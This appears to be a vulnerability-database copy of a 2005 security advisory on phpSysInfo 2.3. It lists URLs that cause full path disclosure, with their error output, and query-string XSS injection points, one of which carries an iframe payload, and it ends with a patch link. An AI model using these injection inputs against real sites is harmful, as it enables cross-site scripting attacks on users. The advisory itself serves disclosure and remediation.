Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpSysInfo23.txt

🗓️ 24 Mar 2005 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

PHPSysInfo 2.3 has multiple vulnerabilities leading to full path disclosure attacks.

Code
`  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[phpSysInfo 2.3 Multiple vulnerabilities cXIb8O3.11]  
  
Author: Maksymilian Arciemowicz (cXIb8O3)  
Date: 22.3.2005  
from SECURITYREASON.COM TEAM  
  
  
- --- 0.Description ---  
PHPSysInfo 2.3 is a customizable PHP Script that parses /proc, and formats information nicely. It will display information about system facts like Uptime, CPU, Memory, PCI devices, SCSI devices, IDE devices, Network adapters, Disk usage, and more.  
  
  
- --- 1. Full Path Disclosure ---  
1.0  
http://[host]/[DIR]/includes/os/class.OpenBSD.inc.php  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.OpenBSD.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.OpenBSD.inc.php on line 22  
- ---------------  
  
1.1  
http://[host]/[DIR]/includes/os/class.NetBSD.inc.php  
  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.NetBSD.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.NetBSD.inc.php on line 22  
- ---------------  
  
  
1.2  
http://[host]/[DIR]/includes/os/class.FreeBSD.inc.php  
  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.FreeBSD.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.FreeBSD.inc.php on line 22  
- ---------------  
  
  
1.3  
http://[host]/[DIR]/includes/os/class.Darwin.inc.php  
  
Error message :  
- ---------------  
Warning: main(./includes/os/class.BSD.common.inc.php) [function.main]: failed to open stream: No such file or directory in /www/phpsysinfo-dev/includes/os/class.Darwin.inc.php on line 22  
  
Fatal error: main() [function.require]: Failed opening required './includes/os/class.BSD.common.inc.php' (include_path='.:') in /www/phpsysinfo-dev/includes/os/class.Darwin.inc.php on line 22  
- ---------------  
  
  
1.4  
http://[host]/[DIR]/includes/XPath.class.php  
  
Error message :  
- ---------------  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 5056  
  
...  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974  
  
Warning: array_merge() [function.array-merge]: Argument #2 is not an array in /www/phpsysinfo-dev/includes/XPath.class.php on line 4974  
- ---------------  
  
  
1.5  
http://[host]/[DIR]/includes/system_header.php  
  
Error message :  
- ---------------  
Fatal error: Call to undefined function created_by() in /www/phpsysinfo-dev/includes/system_header.php on line 39  
- ---------------  
  
  
1.6  
http://[host]/[DIR]/includes/system_footer.php  
  
Error message :  
- ---------------  
Warning: opendir(templates/) [function.opendir]: failed to open dir: No such file or directory in /www/phpsysinfo-dev/includes/system_footer.php on line 21  
  
Warning: readdir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 22  
  
Warning: closedir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 27  
  
Warning: asort() expects parameter 1 to be array, null given in /www/phpsysinfo-dev/includes/system_footer.php on line 29  
  
Warning: Variable passed to each() is not an array or object in /www/phpsysinfo-dev/includes/system_footer.php on line 31  
  
Warning: opendir(includes/lang/) [function.opendir]: failed to open dir: No such file or directory in /www/phpsysinfo-dev/includes/system_footer.php on line 53  
  
Warning: readdir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 54  
  
Warning: closedir(): supplied argument is not a valid Directory resource in /www/phpsysinfo-dev/includes/system_footer.php on line 59  
  
Warning: asort() expects parameter 1 to be array, null given in /www/phpsysinfo-dev/includes/system_footer.php on line 61  
  
Warning: Variable passed to each() is not an array or object in /www/phpsysinfo-dev/includes/system_footer.php on line 63  
- ---------------  
  
  
- --- 2. XSS aka Cross Site Scripting ---  
if register_globals=On :  
  
2.0  
http://[host]/[DIR]/index.php?sensor_program=[XSS]  
  
2.1  
  
http://[host]/[DIR]/includes/system_footer.php?text[language]=">[XSS]  
  
http://[host]/[DIR]/includes/system_footer.php?text[template]=">[XSS]  
  
http://[host]/[DIR]/includes/system_footer.php?hide_picklist=cXIb8O3&VERSION=<iframe src=http://securityreason.com>  
  
etc.  
  
  
- --- 3. How to fix ---  
  
Download my patch.  
http://securityreason.com/patch/phpSysInfo-2.3.patch.by.cXIb8O3.tar.gz  
  
- --- 4. Greets ---  
  
sp3x.   
  
good adv.. => coming soon....  
  
- --- 5.Contact ---  
Author: Maksymilian Arciemowicz ( cXIb8O3 )  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: http://www.securityreason.com  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCQa+1znmvyJCR4zQRAsNAAJ9mmONeqABZoS1CwMj4hRqAzjxHdgCfTRu7  
Am3hGy9bgcms4OHoCcHMDP4=  
=20uz  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
multiple vulnerabilitiesfull path disclosurephp scriptsystem informationerror messages
25